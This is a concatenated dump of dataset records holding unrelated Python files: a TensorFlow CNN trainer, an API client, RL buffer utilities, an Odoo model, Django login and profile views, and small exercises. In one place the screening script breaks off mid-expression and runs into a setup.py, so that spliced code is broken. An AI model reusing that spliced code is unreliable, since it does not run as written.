enumerate(label_dir):\n for img in glob.glob(folder+suffix):\n image = cv2.imread(img)\n image = color.rgb2gray(image)\n image = transform.resize(image,(w,h,c))\n images.append(image)\n 
labels.append(index)\n return np.asarray(images,dtype=np.float32),np.asarray(labels,dtype=np.int32)\n \ntrain_data,train_label = read_image(train_path,w,h,c)\ntrain_image_num = len(train_data)\ntrain_image_index = np.arange(train_image_num)\nnp.random.shuffle(train_image_index)\ntrain_data = train_data[train_image_index]\ntrain_label = train_label[train_image_index]\n\ntest_data,test_label = read_image(test_path,w,h,c)\ntest_image_num = len(test_data)\ntest_image_index = np.arange(test_image_num)\nnp.random.shuffle(test_image_index)\ntest_data = test_data[test_image_index]\ntest_label = test_label[test_image_index]\n\ndef inference(input_tensor,regularizer,keep_prob):\n \n with tf.variable_scope('layer1-conv1'):\n conv1_weights = tf.get_variable('weight',[5,5,1,6],initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv1_biases = tf.get_variable('bias',[6],initializer=tf.constant_initializer(0.0))\n conv1 = tf.nn.conv2d(input_tensor,conv1_weights,strides=[1,1,1,1],padding='VALID')\n relu1 = tf.nn.relu(tf.nn.bias_add(conv1,conv1_biases))\n \n with tf.name_scope('layer2-pool1'):\n pool1 = tf.nn.max_pool(relu1,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')\n \n pool_shape = pool1.get_shape().as_list()\n nodes = pool_shape[1]*pool_shape[2]*pool_shape[3]\n reshaped = tf.reshape(pool1,[-1,nodes])\n \n with tf.variable_scope('layer3-fc1'):\n fc3_weights = tf.get_variable('weight',[nodes,120],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('losses',regularizer(fc3_weights))\n fc3_biases = tf.get_variable('bias',[120],initializer=tf.truncated_normal_initializer(stddev=0.1))\n fc3_out = tf.matmul(reshaped,fc3_weights) + fc3_biases\n \n dropout_out = tf.nn.dropout(fc3_out, keep_prob)\n \n with tf.variable_scope('layer4-fc2'):\n fc4_weights = tf.get_variable('weight',[120,9],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('losses',regularizer(fc4_weights))\n fc4_biases = tf.get_variable('bias',[9],initializer=tf.truncated_normal_initializer(stddev=0.1))\n out = tf.matmul(dropout_out,fc4_weights) + fc4_biases\n \n return out\n\ndef get_batch(data,label,batch_size):\n for start_index in range(0,len(data)-batch_size+1,batch_size):\n slice_index = slice(start_index,start_index+batch_size)\n yield data[slice_index],label[slice_index]\n\nkeep_prob = tf.placeholder(\"float\",name='keep_prob')\nx = tf.placeholder(tf.float32,[None,w,h,c],name='x') \ny_ = tf.placeholder(tf.int32,[None],name='y_')\n\nregularizer = tf.contrib.layers.l2_regularizer(0.001)#L2正则化 减少网络结构 防止过拟合\ny = inference(x,regularizer,keep_prob) \n\nnew_y = tf.nn.softmax(y,name='new_y')\n\ncross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y,labels=y_) \ncross_entropy_mean = tf.reduce_mean(cross_entropy) \n#tf.get_collection:从一个结合中取出全部变量,是一个列表\nloss = cross_entropy_mean + tf.add_n(tf.get_collection('losses'))\n\n#learn_rate = tf.placeholder(\"float\")\n\ntrain_op = tf.train.AdamOptimizer(0.001).minimize(loss)\ncorrect_prediction = tf.equal(tf.cast(tf.argmax(y,1),tf.int32),y_)\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\n\nwith tf.Session() as sess:\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n batch_size = 10\n train_num = 150\n rate = 0.001\n Tra_acc = np.zeros(train_num)\n Tes_acc = np.zeros(train_num)\n for i in range(train_num):\n train_loss,train_acc,batch_num = 0, 0, 0\n for train_data_batch,train_label_batch in 
get_batch(train_data,train_label,batch_size):\n _,tra_err,tra_acc = sess.run([train_op,loss,accuracy],feed_dict={\n x:train_data_batch,\n y_:train_label_batch,\n keep_prob:0.5})\n train_loss+=tra_err\n train_acc+=tra_acc\n batch_num+=1\n Tra_acc[i] = train_acc/batch_num\n if (Tra_acc[i]<0.75) & (Tra_acc[i]>0.5):\n rate = 0.001\n elif Tra_acc[i]>0.75:\n rate = 0.001\n print('第',str(i),'次 train acc:',Tra_acc[i])\n \n test_acc,batch_num_t = 0, 0\n for test_data_batch,test_label_batch in get_batch(test_data,test_label,batch_size):\n tes_acc = sess.run(accuracy,feed_dict={\n x:test_data_batch,\n y_:test_label_batch,\n keep_prob:1.0})\n test_acc+=tes_acc\n batch_num_t+=1\n Tes_acc[i] = test_acc/batch_num_t\n print('第',str(i),'次 test acc:',Tes_acc[i])\n plt.plot(Tra_acc),plt.plot(Tes_acc)\n saver.save(sess,\"./trained.ckpt\")","sub_path":"tf_base_5.py","file_name":"tf_base_5.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16413891","text":"import os\nimport json\nimport errno\nimport zipfile\nimport requests\nimport StringIO\n\n\nclass APIBase(object):\n\tdef __init__(self, home, api_url, token, config, debug, **kwargs):\n\t\tself.home = os.path.realpath(os.path.expanduser(home))\n\t\tself.api_url = api_url\n\t\tself.config = os.path.realpath(os.path.expanduser(config))\n\t\tself.debug = debug\n\n\t\tself.try_read_config(token)\n\n\tdef _build_url(self, url):\n\t\treturn requests.compat.urljoin(self.api_url, url)\n\n\tdef _headers(self):\n\t\treturn {\n\t\t\t'Authorization': 'token %s' % (self.token)\n\t\t}\n\n\tdef _call(self, url, method, **kwargs):\n\t\tkwargs['headers'] = self._headers()\n\n\t\tmethod = getattr(requests, method)\n\n\t\tresponse = method(self._build_url(url), **kwargs)\n\t\tresponse.raise_for_status()\n\t\treturn response\n\n\tdef _get(self, url, data={}):\n\t\treturn self._call(url, 'get', params=data)\n\n\tdef _post(self, url, data={}):\n\t\treturn self._call(url, 'post', data=data)\n\n\nclass LangAPIMixin():\n\tdef lang_list(self):\n\t\treturn self._get(self._build_url('/api/v1/lang/')).json()\n\n\nclass TaskAPIMixin():\n\tdef task_list(self, lang):\n\t\treturn self._get(self._build_url('/api/v1/task/'), {'lang': lang}).json()\n\n\tdef has_task(self, lang, task):\n\t\ttry:\n\t\t\tself._get(self._build_url('/api/v1/task/%s-%s' % (lang, task, )))\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t\tif e.response.status_code == 404:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\traise\n\t\telse:\n\t\t\treturn True\n\n\tdef task_get(self, lang, task):\n\t\ttask = self._get(self._build_url('/api/v1/task/%s-%s/' % (lang, task, ))).json()\n\n\t\tzip = zipfile.ZipFile(\n\t\t\tStringIO.StringIO(\n\t\t\t\trequests.get(task.get('content'), stream=True).content\n\t\t\t)\n\t\t)\n\n\t\tpath = os.path.join(os.path.expanduser(self.home), lang, task.get('name'))\n\n\t\ttry:\n\t\t\tos.makedirs(path)\n\t\texcept OSError as exc:\n\t\t\tif exc.errno == errno.EEXIST and os.path.isdir(path):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\traise\n\n\t\tzip.extractall(path)\n\n\nclass AuthMixin():\n\tdef login(self, github_token):\n\t\treturn self._post(self._build_url('api-token-auth/'), {\n\t\t\t'github_token': github_token\n\t\t}).json()\n\n\nclass StatsMixin():\n\tdef stats(self):\n\t\treturn self._get(self._build_url('/stats/')).json()\n\n\nclass SolutionMixin():\n\tdef persist_token(self, token):\n\t\twith open(self.config, 'w') as f:\n\t\t\tf.write(json.dumps(dict(token=token)))\n\n\tdef 
try_read_config(self, default=None):\n\t\tif os.path.isfile(self.config):\n\t\t\twith open(self.config, 'r') as f:\n\t\t\t\tself.token = json.loads(f.read()).get('token')\n\t\telse:\n\t\t\tself.token = default\n\n\tdef solution_get(self, hash_id):\n\t\treturn self._get(self._build_url('/api/v1/solution/%s/' % (hash_id, ))).json()\n\n\tdef solution_list(self, lang, task):\n\t\treturn self._get(self._build_url('/api/v1/solution/'), {'lang': lang, 'task': task}).json()\n\n\tdef submit(self, lang, task, files):\n\t\tin_memory = StringIO.StringIO()\n\t\tzip = zipfile.ZipFile(in_memory, \"a\")\n\n\t\tfor file in files:\n\t\t\tzip.write(file.path, file.rel)\n\n\t\t\tfor f in zip.filelist:\n\t\t\t\tf.create_system = 0\n\n\t\tzip.close()\n\t\tin_memory.seek(0)\n\n\t\ttry:\n\t\t\tresponse = requests.post(self._build_url('/api/v1/submit/'), files={\n\t\t\t\t'content': in_memory.read()\n\t\t\t}, data={\n\t\t\t\t'lang': lang,\n\t\t\t\t'task': task,\n\t\t\t}, headers=self._headers())\n\n\t\t\tresponse.raise_for_status()\n\n\t\t\treturn response.json()\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t\tif e.response.status_code == 401:\n\t\t\t\tfrom oplevelse import oplevelse\n\t\t\t\traise oplevelse.NotAuthorized()\n\t\t\telse:\n\t\t\t\traise\n\n\nclass OplevelseAPI(APIBase, LangAPIMixin, TaskAPIMixin, SolutionMixin, AuthMixin, StatsMixin):\n\tpass\n","sub_path":"cli/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"33094518","text":"import numpy as np\nimport pandas as pd\nimport argparse\n\n\ndef check_smiles_match(data,screen):\n return (data['SMILES'].values==screen['SMILES'].values).all()\n\ndef apply_screen(data,col_name,selection_type,selection_thresh,keep):\n data = data.sort_values(col_name,ascending=True)\n if selection_type=='Fraction':\n if keep=='High':\n data = data[-int(len(data)*selection_thresh):]\n elif keep=='Low':\n data = data[0:-int(len(data)*selection_thresh)]\n else:\n print('WARNING: INVALID KEEP TYPE')\n elif selection_type=='Cutoff':\n if keep=='High':\n data = data[data[col_name]>selection_thresh]\n elif keep=='Low':\n data = data[data[col_name]\n# Last Change: October 9, 2016\n# URL: https://capturer.readthedocs.org\n\n# Standard library modules.\nimport codecs\nimport os\nimport re\n\n# De-facto standard solution for Python packaging.\nfrom setuptools import setup, find_packages\n\n# Find the directory where the source distribution was unpacked.\nsource_directory = os.path.dirname(os.path.abspath(__file__))\n\n# Find the current version.\nmodule = os.path.join(source_directory, 'capturer', '__init__.py')\nfor line in open(module, 'r'):\n match = re.match(r'^__version__\\s*=\\s*[\"\\']([^\"\\']+)[\"\\']$', line)\n if match:\n version_string = match.group(1)\n break\nelse:\n raise Exception(\"Failed to extract version from %s!\" % module)\n\n# Fill in the long description (for the benefit of PyPI)\n# with the contents of README.rst (rendered by GitHub).\nreadme_file = os.path.join(source_directory, 'README.rst')\nwith codecs.open(readme_file, 'r', 'utf-8') as handle:\n readme_text = handle.read()\n\nsetup(\n name='capturer',\n version=version_string,\n description=\"Easily capture stdout/stderr of the current process and subprocesses\",\n long_description=readme_text,\n url='https://capturer.readthedocs.org',\n author='Peter Odding',\n author_email='peter@peterodding.com',\n packages=find_packages(),\n test_suite='capturer.tests',\n 
install_requires=[\n 'humanfriendly >= 2.1',\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Topic :: Communications',\n 'Topic :: Scientific/Engineering :: Human Machine Interfaces',\n 'Topic :: Software Development',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: User Interfaces',\n 'Topic :: System :: Shells',\n 'Topic :: System :: System Shells',\n 'Topic :: System :: Systems Administration',\n 'Topic :: Terminals',\n 'Topic :: Text Processing :: General',\n ])\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15839503","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 18 14:36:18 2018\n\n@author: ben\n\"\"\"\n\nfrom astropy.io import fits\nfrom scipy.optimize import nnls \n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.style.available\nmpl.style.use('seaborn-white') \n\nimport numpy as np\nimport scipy as sci\n\nA = fits.getdata('Q_tomo.fits')\n\nprint(np.linalg.cond(A))\nmu = 1.0/np.linalg.norm(A)**2\nprint(mu)\n\n#plt.figure()\n#plt.imshow(A,cmap='magma',interpolation='nearest')\n\nx_true = np.zeros(50)\nx_true[21] = 1.\nb = np.dot(A,x_true)\n\n#b += np.random.standard_normal(b.shape) * 1e-6\n\nplt.figure('True solution')\nplt.plot(x_true)\n\n\nplt.figure('Given right hand side')\nplt.plot(b)\n\n\n\n#===================================\n# Type of regularization\n#===================================\nreg = 'l0' # or 'l0'\n\n#===================================\n# Set tuning parameters\n#===================================\n_, s, _ = sci.linalg.svd(A, False)\nkappa = s[0] ** 2 * 0.001\nnu = 1 / kappa * 0.1\nlamb = 1e-11 / 3 # controll level of sparsity \nbeta = 1e-12 # add some ridge\n\n\nmaxiter = 20000 # max iterations\n\n#===================================\n# Init Algorithm\n#===================================\nC = np.eye(len(x_true))\nH = A.T.dot(A) + kappa * C.T.dot(C)\nHinv = sci.linalg.pinv2(H)\n\nFupper = kappa * A.dot(Hinv).dot(C.T)\nFlower = np.sqrt(kappa) * (np.eye(C.shape[0]) - kappa * C.dot(Hinv).dot(C.T))\nF = np.concatenate((Fupper, Flower))\n\nGupper = np.eye(A.shape[0]) - A.dot(Hinv).dot(A.T)\nGlower = np.sqrt(kappa) * C.dot(Hinv).dot(A.T)\nG = np.concatenate((Gupper, Glower))\n\ng = G.dot(b)\n\n#===================================\n# Project\n#===================================\nQ , _, _ = sci.linalg.svd(F, False)\n\nQ = Q[:,0:5]\n\nF = Q.T.dot(F)\ng = Q.T.dot(g)\n\nw = np.zeros(x_true.shape)\nfor i in range(maxiter):\n\n grad = F.T.dot(F.dot(w) - g) - beta * w\n w_temp = w - nu * grad\n\n if reg == 'l1':\n # l1 soft-threshold\n idxH = w_temp > lamb * nu\n idxL = w_temp <= -lamb * nu\n w = np.zeros_like(w_temp)\n w[idxH] = w_temp[idxH] - lamb * nu\n w[idxL] = w_temp[idxL] + lamb * nu\n\n if reg == 'l0':\n\n # l0 soft-threshold\n idxH = w_temp**2 > (lamb * nu) ** 2\n w = np.zeros_like(w_temp)\n w[idxH] = w_temp[idxH] \n w = np.maximum(w, 0.0)\n \n \nplt.figure('Estimate for 
w')\nplt.plot(w)\n \nxapprox = Hinv.dot(A.T.dot(b) + kappa * C.T.dot(w))\n \nplt.figure('Estimate for x')\nplt.plot(xapprox)\n","sub_path":"relaxed_lasso_projected.py","file_name":"relaxed_lasso_projected.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"194195064","text":"temp = int(raw_input(\"What is the temperature? \"))\nhumidity = raw_input(\"Is humidity high or low? \")\ntornado_warning = raw_input(\"Do you see a tornado? \")\n# elif example\n\n# I want a special message for extreme conditions\nif (temp >= 100) and (humidity == \"high\"):\n\tprint(\"Heat advisory due to humidity and high temperature. Use extra caution\")\n# Want to print this if it is humid. I don't want to print both the first message and this one because that would be repetitive.\nelif (temp > 80) and (humidity == \"high\"):\n\tprint(\"Heat advisory due to humidity\")\n# Want to print this if it is hot but not if it is hot and humid. If it is hot and humid we have already given the \"extra caution\" message.\nelif temp >= 100:\n\tprint(\"Heat advisory due to temperature\")\n# We checked all the conditions for a heat advisory and none of them applied.\nelse:\n\tprint(\"No heat advisory\")\n\n# If these were all if statements, then on the very hot humid days we would get too many repetitive messages.\n# Another benefit is that our elif statements keep track of three different ways there could be a heat advisory.\n\n# This additional condition will always be evaluated, regardless of the previous statements.\nif tornado_warning == 'yes':\n\tprint(\"Stop worrying about the heat and take cover!\")\n","sub_path":"lesson-3/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"31869955","text":"# Source : https://leetcode.com/problems/search-in-rotated-sorted-array/\n# Author : Phat Nguyen\n# Date : 2015-03-25\n\n\"\"\"\nPROBLEM:\nSuppose a sorted array is rotated at some pivot unknown to you beforehand.\n\n(i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).\n\nYou are given a target value to search.
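(For example, in the rotated array above, the target 0 would be found at index 4.)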
If found in the array return its index, otherwise return -1.\n\nYou may assume no duplicate exists in the array.\n\nSOLUTION:\n\n\"\"\"\n\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return an integer\n def search(self, A, target):\n i = self.mainIndex(A, 0, len(A)-1)\n if i == -1:\n plus = 0\n else:\n plus = i\n return self.binSearch(A, 0, len(A)-1, target, plus)\n \n def mainIndex(self, A, left, right):\n if left == right:\n return -1\n if left == right - 1:\n if A[left] > A[right]:\n return right\n else:\n return -1\n \n mid = (left + right) / 2\n if A[left] < A[mid]:\n return self.mainIndex(A, mid, right)\n else:\n return self.mainIndex(A, left, mid)\n \n def binSearch(self, A, left, right, target, plus):\n if left > right:\n return -1\n else:\n mid = (left + right) / 2\n if A[(mid+plus)%len(A)] > target:\n return self.binSearch(A, left, mid - 1, target, plus)\n elif A[(mid+plus)%len(A)] < target:\n return self.binSearch(A, mid + 1, right, target, plus)\n else:\n return (mid+plus)%len(A)\n","sub_path":"py/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"278998753","text":"from collections import deque\nimport numpy as np\nimport os\nfrom random import sample\nfrom utilfunctions import one_hot\nfrom utilfunctions import scale_state\nfrom utilfunctions import initializer\nfrom utilfunctions import single_shape_adaptor\nfrom utilfunctions import update_state_step\n\n\nclass event:\n '''\n the class event offers a container for \n s, a, r, s_prime tuple to gether with done\n \n one should note that the s, and s' are saved in scaled form\n (which is expected as the input for the networks)\n '''\n def __init__(self, state, action_id, reward, state_prime, done, env):\n # converting the state, state_prime to scaled ones\n scaled_state = scale_state(state, env)\n scaled_state_prime = scale_state(state_prime, env)\n # one_hot the action\n action = one_hot(action_id, nr_actions=env.action_space.n)\n\n self.scaled_state = scaled_state\n self.action = action\n self.reward = reward\n self.scaled_state_prime = scaled_state_prime\n self.done = done\n\n\nclass Histories:\n '''\n a class for creation and manipulation of the buffer\n '''\n def __init__(self, max_size=10_000): #, size=1000\n self.size = 0 #size\n self.events = deque([])\n self.max_size = max_size\n\n def reset_the_buffer(self):\n '''\n reset the buffer\n '''\n self.events = ([])\n self.size = 0\n \n def consider_this_event(self, event):\n if (self.size < self.max_size):\n self.fill_by_appending(event)\n else:\n self.roll_and_replace(event)\n \n def fill_by_appending(self, event):\n '''\n filling a new buffer or a resetted one by appending to it\n '''\n self.events.append(event)\n #import pdb; pdb.set_trace()\n if (len(self.events) > self.size):\n self.size += 1\n\n def roll_and_replace(self, event):\n '''\n rolls the buffer, pushing the oldest experience out and adding a new one at the end of the list\n '''\n self.events.rotate(-1)\n self.events[0] = event\n\n def return_a_batch(self, batchsize=32):\n '''\n returns a random batch from the bucket, note that it first shuffles the bucket\n and then picks the sampels.\n '''\n return sample(self.events, k=batchsize)\n\n\ndef logging_performance(log, training_id, steps, write_to_disk=True):\n '''\n returns a log (a numpy array) which has some analysis of the each round of training.\n\n Key arguments:\n\n training_id -- 
the id of the iteration which is just finished.\n steps -- the total number of steps before failing\n write_to_disk -- a flag for writting the performance to the disk\n\n Output:\n\n a numpy array with info about the iterations and the learning\n '''\n\n if training_id == 0:\n log = np.array([[training_id, steps]])\n else:\n log = np.append(log, np.array([[training_id, steps]]), axis=0)\n\n if write_to_disk:\n perfdir = './performance-and-animations/'\n if not os.path.exists(perfdir):\n os.makedirs(perfdir)\n\n np.savetxt(perfdir+'steps_vs_iteration.dat', log)\n\n return log\n\n\ndef initial_filling_of_buffer(rounds_data_exploration, agent, main_buffer, env, epsilon):\n '''\n fills the main_buffer with events, i.e. (s, a, r, s', done)\n which are happened during some rounds of experiments\n for the agent. The actions that the agent took are based on the Q-target network with epsilon greedy approach\n \n Keyword arguments:\n\n rounds_data_exploration -- number of experiment rounds done \n agent -- the agent\n main_buffer -- the replay buffer\n env -- environement\n epsilon -- the epsilon for the epsilon greedy approach\n\n returns:\n\n the replay buffer\n '''\n \n nr_features = env.observation_space.high.shape[0]\n \n for training_id in range(rounds_data_exploration):\n\n print(\"\\nround: \"+str(training_id))\n\n initial_state = env.reset()\n\n state, terminated, steps = initializer(initial_state)\n state = single_shape_adaptor(state, nr_features)\n \n while not terminated:\n\n action_id = agent.action_based_on_Q_target(state, env, epsilon)\n\n new_state, reward, terminated, info = env.step(action_id)\n\n new_state = single_shape_adaptor(new_state, nr_features)\n\n this_event = event(state, action_id, reward, new_state, terminated, env)\n\n #main_buffer.fill_by_appending(this_event)\n main_buffer.consider_this_event(this_event)\n \n state, steps = update_state_step(new_state, steps)\n\n print(\"... the terminal_state is reached after \"+str(steps))\n\n return main_buffer\n\n\ndef testing_performance(agent, nr_steps_test, env):\n ''' runs a number of episodes and returns the average performance'''\n \n sum_step_performance = 0\n\n nr_features = env.observation_space.high.shape[0]\n\n print(\"... the test is started\")\n\n for test_id in range(nr_steps_test):\n initial_state_t = env.reset()\n state_t, terminated_t, steps_t = initializer(initial_state_t)\n state_t = single_shape_adaptor(state_t, nr_features)\n\n while not terminated_t:\n action_id_t = agent.action_based_on_Q_target(state_t, env, epsilon=0.0)\n new_state_t, reward_t, terminated_t, info_t = env.step(action_id_t)\n new_state_t = single_shape_adaptor(new_state_t, nr_features)\n state_t, steps_t = update_state_step(new_state_t, steps_t)\n if test_id == 0:\n env.render()\n\n sum_step_performance += steps_t\n print(\"... 
test #\"+str(test_id)+\" with performance \"+str(steps_t))\n \n sum_step_performance /= nr_steps_test\n\n return sum_step_performance\n","sub_path":"rl_utils.py","file_name":"rl_utils.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20895763","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict\n\n\ndef run(lines):\n def is_nice(word):\n around_letter = False\n # could do with regexes and capture group refs\n # (.).\\1' and (..).+\\1\n # but let's invent something more fun\n # iterate in overlapping triplets\n for _1, _, _3 in zip(word, word[1:], word[2:]):\n if _1 == _3:\n around_letter = True\n i = 0\n pair2index = defaultdict(list)\n pair2count = defaultdict(int)\n # iterate overlapping pairs\n for _1, _2 in zip(word, word[1:]):\n # save each pair and its starting location\n pair2index[_1, _2].append(i)\n # save count for each pair\n pair2count[_1, _2] += 1\n i += 1\n has_pair = False\n # find the first pair that occurs more than once\n # at indices with diff > 1 (no overlap)\n for pair, count in pair2count.items():\n if count > 1:\n indices = pair2index[pair]\n for i1, i2 in zip(indices, indices[1:]):\n if i2 - i1 > 1:\n has_pair = True\n break\n else:\n continue\n break\n return around_letter and has_pair\n nice_count = 0\n for line in lines:\n if is_nice(line):\n nice_count += 1\n return nice_count\n\n\nwith open('input.txt') as lines:\n print(run((line.strip() for line in lines)))\n","sub_path":"05/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408168190","text":"from odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\n\n\nclass VmMarksheetLine(models.Model):\n _name = \"vm.marksheet.line\"\n _rec_name = \"student_id\"\n _description = \"Marksheet Line\"\n\n marksheet_reg_id = fields.Many2one(\n 'vm.marksheet.register', 'Marksheet Register')\n evaluation_type = fields.Selection(related='marksheet_reg_id.exam_session_id.evaluation_type',\n store=True)\n student_id = fields.Many2one('vm.student', 'Student', required=True)\n result_line = fields.One2many(\n 'vm.result.line', 'marksheet_line_id', 'Results')\n total_marks = fields.Integer(\"Total Marks\",\n compute='_compute_total_marks',\n store=True)\n percentage = fields.Float(\"Percentage\", compute='_compute_percentage',\n store=True)\n generated_date = fields.Date(\n 'Generated Date', required=True,\n default=fields.Date.today(), track_visibility='onchange')\n grade = fields.Char('Grade', readonly=True, compute='_compute_grade')\n status = fields.Selection([\n ('pass', 'Pass'),\n ('fail', 'Fail')\n ], 'Status', compute='_compute_status', store=True)\n active = fields.Boolean(default=True)\n\n @api.constrains('total_marks', 'percentage')\n def _check_marks(self):\n for record in self:\n if (record.total_marks < 0.0) or (record.percentage < 0.0):\n raise ValidationError(_(\"Enter proper marks or percentage!\"))\n\n @api.depends('result_line.marks')\n def _compute_total_marks(self):\n for record in self:\n record.total_marks = sum([\n int(x.marks) for x in record.result_line])\n\n @api.depends('total_marks')\n def _compute_percentage(self):\n for record in self:\n total_exam_marks = sum(\n [int(x.exam_id.total_marks) for x in record.result_line])\n record.percentage = \\\n record.total_marks and \\\n (100 * record.total_marks) / total_exam_marks or 0.0\n\n 
@api.depends('percentage')\n def _compute_grade(self):\n for record in self:\n if record.evaluation_type == 'grade':\n grades = record.marksheet_reg_id.result_template_id.grade_ids\n for grade in grades:\n if grade.min_per <= record.percentage and \\\n grade.max_per >= record.percentage:\n record.grade = grade.result\n else:\n record.grade = None\n else:\n record.grade = None\n\n @api.depends('result_line.status')\n def _compute_status(self):\n for record in self:\n record.status = 'pass'\n for result in record.result_line:\n if result.status == 'fail':\n record.status = 'fail'\n","sub_path":"viseducat_exam/models/marksheet_line.py","file_name":"marksheet_line.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"410597663","text":"from os.path import abspath, expanduser\r\nimport subprocess\r\n\r\n\"\"\"\r\nUses sentence compression: https://github.com/cnap/sentence-compression\r\nI made the following adjustments:\r\n* build.xml uses multirootfileset to point to cplex and research/compression\r\n* compress takes -t as targets, -r correctly takes argument now\r\n* CompressionModel.java correctly overrides targets over compression ratio\r\n* CompressionModel.java has targets as upper limits\r\n\"\"\"\r\n\r\npath = '~/sentence-compression/compress'\r\nlm = '~/Language Models/lm_giga_64k_vp_3gram/lm_giga_64k_vp_3gram.arpa'\r\ntmp_sents = 'sentences_to_shorten.txt'\r\ntmp_goals = 'goal_lengths.txt'\r\n\r\ndef write_line(file, line):\r\n file.write('{}\\n'.format(line))\r\n\r\ndef exact(p):\r\n return '\"{}\"'.format(p)\r\n\r\ndef compress_sentences(sents, lens):\r\n with open(tmp_sents, 'w') as f:\r\n with open(tmp_goals, 'w') as l:\r\n for i, p in enumerate(zip(sents, lens)):\r\n s, d = p\r\n write_line(f, s)\r\n write_line(l, '{}.{}\\t\\t\\t{}'.format(tmp_sents, i, d - 1))\r\n to_process = [expanduser(path), '-i', tmp_sents, '-l',\r\n exact(expanduser(lm)), '-t', tmp_goals, '-q']\r\n proc = subprocess.run(to_process, stdout=subprocess.PIPE).stdout\r\n for line in proc.decode('utf8').split('\\n'):\r\n if line:\r\n yield line.split('\\t')[2]\r\n","sub_path":"sentence_compression.py","file_name":"sentence_compression.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"262604220","text":"from django.shortcuts import render, HttpResponseRedirect, HttpResponse\nfrom django.http import JsonResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .models import Profile, Relation\nfrom django.views.decorators.csrf import csrf_exempt, csrf_protect\nfrom django.core.exceptions import ObjectDoesNotExist\nimport os\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\nfrom django.conf import settings\nfrom .forms import PostForm\n\n# Create your views here.\ndef home(request):\n return render(request, \"index.html\", {'title': \"Rusty\"})\n\n\ndef __register(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect(\"/\")\n if request.method == \"POST\":\n username = request.POST['username']\n email = request.POST['email']\n password = request.POST['password']\n try:\n userfdb = User.objects.get(username=username)\n if userfdb is not None:\n return render(request, \"register.html\", {'title': \"register\", 'error': 'username 
already exist'})\n except Exception as e:\n user = User.objects.create_user(username=username, email=email, password=password)\n user.save()\n profile = Profile(user=user)\n profile.statu = 0\n profile.save()\n return HttpResponseRedirect(\"login\")\n\n else:\n return render(request, \"register.html\", {'title': \"register\"})\n\n\ndef __login(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect(\"/\")\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n profile = Profile.objects.get(user=user)\n if profile.statu == 0:\n return HttpResponseRedirect('completeprofile')\n else:\n return HttpResponseRedirect(\"/\")\n else:\n return render(request, 'login.html', {'title': \"login page\"})\n elif request.method == \"GET\":\n return render(request, 'login.html', {'title': \"login page\"})\n\n\ndef articles(request):\n return render(request, \"articles.html\", {'title': \"Articles\"})\n\n\ndef __profile(request, username):\n if request.method == \"POST\":\n user = User.objects.get(username=username)\n if user:\n profile = Profile.objects.get(user=user)\n if request.FILES.get('img',None):\n path = default_storage.save(request.user.username+\"_\"+request.FILES['img'].name, ContentFile(request.FILES['img'].read()))\n tmp_file = os.path.join(settings.MEDIA_ROOT, path)\n profile.img = path\n profile.fullname = request.POST['fullname']\n profile.about = request.POST['about']\n profile.email = request.POST['email']\n location = request.POST['location']\n company = request.POST['company']\n profile.location = location\n profile.company = company\n profile.save()\n return HttpResponseRedirect(str(request.user))\n 